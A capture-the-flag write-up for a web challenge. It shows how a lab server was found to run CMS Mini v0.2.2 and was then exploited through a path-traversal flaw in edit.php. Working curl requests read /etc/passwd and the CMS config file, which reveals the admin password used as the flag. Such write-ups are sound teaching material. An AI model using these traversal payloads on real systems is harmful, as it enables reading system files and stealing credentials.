Category: Web Points: 200 Description:
A rose like any other name has spikes 10.13.37.12.
http://10.13.37.12/
displays an image, located at /cms/roses.jpg
, that says:
“Roses may say “I love you,”
Note the missing ”
at the end – it seems this quotation is incomplete.
Based on the image URL, let’s check out the /cms/
path. It redirects to /cms/admin/login.php
which displays a login form. In the HTML source we find:
<title>CMSmini - administration page</title>
A Google search for known CMS Mini vulnerabilities reveals multiple vulnerabilities in v0.2.2, among which file inclusion:
http://
[target/IP]/cmsmini/admin/edit.php?path=&name=../../../../../etc/passwd
Let’s see if the given site is vulnerable (i.e. if it’s running v0.2.2 or older):
$ curl 'http://10.13.37.12/cms/admin/edit.php?path=&name=../../../../../../etc/passwd'
And indeed, this returns the contents of /etc/passwd
as part of the response.
After studying the CMS Mini source code, we learn that its configuration file is stored in cms/admin/config.php
. Let’s find out what its contents are for this server:
$ curl -s 'http://10.13.37.12/cms/admin/edit.php?path=&name=../../../../var/www/cms/admin/config.php'
…
$admin_login = 'admin';
$admin_pass = 'RosesmaysayIloveyoubutthecactussaysFuckoff';
…
The flag is RosesmaysayIloveyoubutthecactussaysFuckoff
.
- none yet